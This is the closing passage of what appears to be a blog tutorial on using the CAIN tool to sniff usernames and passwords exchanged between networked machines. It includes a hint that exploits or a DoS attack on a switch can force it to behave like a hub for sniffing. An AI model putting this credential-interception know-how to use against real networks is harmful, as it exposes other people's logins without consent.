* You can check the password in the PASSWORD pane.

NOTE:-

* Do not misuse.
* CAIN can be only installed if you have administrator on the system.
* The local passwords will not be logged, only the passwords and usernames exchanged between the targets is logged.
* If you have a switched network some exploits or a simple DoS attack on the device could make it behave like hub this activity is possibly detectable.
* The thoughts and whole written are my own, and in anyway I am not responsible for any kind of harm by this tutorial.

SERIOUSLY FOR EDUCATIONAL PURPOSES!!
 
Support : INDIATRIKS
Copyright © 2011. INDIATRIKS - All Rights Reserved
Template Edited By Indiatriks
Proudly Powered By Blogger